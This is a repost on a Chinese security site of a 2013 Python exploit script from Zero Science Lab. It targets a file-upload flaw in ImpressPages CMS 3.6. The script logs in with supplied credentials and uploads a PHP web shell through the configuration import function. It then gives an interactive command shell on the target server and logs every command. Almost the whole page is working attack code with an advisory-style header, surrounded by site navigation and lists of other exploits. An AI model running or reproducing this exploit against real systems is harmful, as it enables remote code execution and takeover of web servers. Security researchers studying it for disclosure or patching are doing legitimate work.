首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2013-11-05  
#!/usr/bin/python
#
#
# ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit
#
#
# Vendor: ImpressPages UAB
# Product web page: http://www.impresspages.org
# Affected version: 3.6, 3.5 and 3.1
#
# Summary: ImpressPages CMS is an open source web content management system with
# revolutionary drag & drop interface.
#
# Desc: The vulnerability is caused due to the improper verification of uploaded
# files in '/ip_cms/modules/developer/config_exp_imp/manager.php' script thru the
# 'manage()' function (@line 65) when importing a configuration file. This can be
# exploited to execute arbitrary PHP code by uploading a malicious PHP script file
# that will be stored in '/file/tmp' directory after successful injection.
# Permission Developer[Modules exp/imp] is required (parameter 'i_n_2[361]' = on)
# for successful exploitation.
#
# Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
#            GNU/Linux CentOS 6.3 (Final)
#            Apache 2.4.2 (Win32) / Apache2
#            PHP 5.4.7 / PHP 5.3.21
#            MySQL 5.5.25a
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2013-5159
#
#
#
# 12.10.2013
#
   
ver = '1.0.0.000251'
   
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re
   
from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError
   
init()
   
if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])
   
def bannerche():
    print """
 @---------------------------------------------------------------@
 |                                                               |
 |                 ImpressPages CMS 3.6 RCE 0day                 |
 |                                                               |
 |                                                               |
 |                       ID: ZSL-2013-5159                       |
 |                                                               |
 |              Copyleft (c) 2013, Zero Science Lab              |
 |                                                               |
 @---------------------------------------------------------------@
          """
    if len(sys.argv) < 3:
        print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
        print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk impresspages\n'
        sys.exit()
   
bannerche()
   
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
   
host = sys.argv[1]
path = sys.argv[2]
   
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
   
try:
    opener.open('http://'+host+'/'+path+'/admin.php')
except urllib2.HTTPError, errorzio:
    if errorzio.code == 404:
        print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
        print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
        sys.exit()
except URLError, errorziocvaj:
    if errorziocvaj.reason:
        print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
        print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
        sys.exit()
   
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
token_chk = opener.open('http://'+host+'/'+path+'/admin.php')
response = token_chk.read()
match = re.search('(?<=security_token=)\w+', response)
sectoken = match.group(0)
   
print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
   
login_data = urllib.urlencode({
                            'f_name' : username,
                            'f_pass' : password,
                            'action' : 'login'
                            })
   
login = opener.open('http://'+host+'/'+path+'/admin.php?action=login&security_token='+sectoken, login_data)
auth = login.read()
for session in cj:
    sessid = session.name
   
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
   
print '\x20\x20[*] Mapping Session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET+'\x20'+'.'*(46 - len(cookie))+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Mapping security token '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Token: '+Fore.YELLOW+sectoken+Fore.RESET+'\x20'+'.'*15+Fore.GREEN+'[OK]'+Fore.RESET
   
if re.search(r'Incorrect name or password', auth):
    print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET
    sys.exit()
elif re.search(r'Your login suspended for one hour', auth):
    print '\x20\x20[*] Your username is suspended for 1 hour '+'.'*17+Fore.RED+'[ER]'+Fore.RESET
    sys.exit()
else:
    print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
    print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
   
class MultiPartForm(object):
   
    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
       
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary
   
    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return
   
    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return
       
    def __str__(self):
   
        parts = []
        part_boundary = '--' + self.boundary
           
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
           
        parts.extend(
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
           
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)
   
if __name__ == '__main__':
   
    form = MultiPartForm()
    form.add_field('spec_security_code', '12345678901234567890123456789012')
    form.add_field('spec_rand_name', 'lib_php_form_standard_1_')
       
    form.add_file('config', 'liwo.php',
                  fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))
   
    request = urllib2.Request('http://'+host+'/'+path+'/admin.php?module_id=361&action=import&security_token='+sectoken)
    request.add_header('User-agent', 'joxypoxy 1.0')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()
   
print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)
furl = '/admin.php?module_id=361&action=import_uploaded&security_token='
   
def osys():
    cmd = 'uname'
    execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
    reverse = execute.read()
    if re.search(r'Linux', reverse, re.IGNORECASE):
        cmd = 'pwd'
        print Style.DIM+Fore.WHITE
        print '\n\x20\x20[*] Coins: 1'
        print '\x20\x20[*] Detected platform: Linux'
        print '\x20\x20[*] Type \'exit\' to leave'
        print '\x20\x20[*] Choose your CMDs wisely'
        print '\x20\x20[*] Your current location:'
        print Style.RESET_ALL+Fore.RESET
        return cmd
    else:
        cmd = 'cd'
        print Style.DIM+Fore.WHITE
        print '\n\x20\x20[*] Coins: 1'
        print '\x20\x20[*] Detected platform: Windows'
        print '\x20\x20[*] Type \'exit\' to leave'
        print '\x20\x20[*] Choose your CMDs wisely'
        print '\x20\x20[*] Your current location:'
        print Style.RESET_ALL+Fore.RESET
        return cmd
   
print
   
today = datetime.date.today()
fname = 'impress-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)
   
logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log generated on: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: ImpressPages CMS 3.6 manage() Function Remote Code Execution')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+ver)
logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+'/'+path+furl+sectoken)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2013-5159')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')
   
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
while True:
    try:
        cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
        if cmd.strip() == '':
            cmd = osys()
   
        execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
        reverse = execute.read()
        pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
   
        print Style.BRIGHT+Fore.CYAN
        cmdout = pattern.match(reverse)
        print cmdout.groups()[0].strip()
        print Style.RESET_ALL+Fore.RESET
   
        if cmd.strip() == 'exit':
            break
   
        logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
    except Exception:
        break
   
logging.warning('\n\n END OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] File '+Fore.YELLOW+fname+Fore.RESET+'\x20'+'.'*19+Fore.GREEN+'[OK]'+Fore.RESET
sys.exit()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache + PHP 5.x Remote Code E
·Avid Media Composer 5.5 - Avid
·AudioCoder 0.8.22 (.m3u) - SEH
·StoryBoard Quick 6 Memory Corr
·Watermark Master Buffer Overfl
·Final Draft 8 File Format Stac
·vTiger CRM 5.3.0 / 5.4.0 Authe
·eCryptfs write_tag_3_packet He
·NAS4Free Arbitrary Remote Code
·Vivotek IP Cameras RTSP Authen
·Zabbix Authenticated Remote Co
·VICIdial Manager Send OS Comma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved